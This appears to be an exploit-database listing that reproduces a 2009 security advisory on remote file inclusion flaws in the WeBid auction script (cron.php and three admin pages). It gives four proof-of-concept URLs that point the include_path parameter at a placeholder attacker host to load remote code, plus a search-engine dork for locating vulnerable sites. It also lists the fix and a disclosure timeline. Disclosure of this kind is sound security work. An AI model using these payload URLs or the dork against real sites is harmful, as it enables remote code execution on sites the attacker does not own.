[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities

Author
K-159
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4926
Category
web applications
Date add
10-03-2009
Platform
unsorted
=================================================================
WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities
=================================================================


---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : WeBid
version     : <= 0.7.3 RC9
Vendor      : http://sourceforge.net/projects/simpleauction
              http://www.webidsupport.com/
Description :

WeBid is Open source php/mysql fully featured auction script. Perfect for those who want to start their own auction site.

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

Input passed to the "$include_path" parameter in cron.php page is not properly verified before being used 
to include files.This can be exploited to include arbitrary files from local or external resources.
This vulnerability also happen to files ST_browsers.php, ST_countries.php, ST_platforms.php in admin's folder
Successful exploitation requires that "register_globals" is enabled.


Poc/Exploit:
~~~~~~~
http://www.example.com/[path]/cron.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_brwosers.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_countries.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_platforms.php?include_path=http://www.attacker.com/evil?

Dork:
~~~
Google : "copyright 2008, WEBID"


Solution:
~~~~~

- Edit the source code to ensure that input is properly verified.
- turn off register_globals.

Timeline:
~~~~~~~

- 08 - 03 - 2009 bug found
- 08 - 03 - 2009 vendor contacted
- 08 - 03 - 2009 vendor response
- 11 - 03 - 2009 advisory release
---------------------------------------------------------------------------



#  0day.today [2024-09-28]  #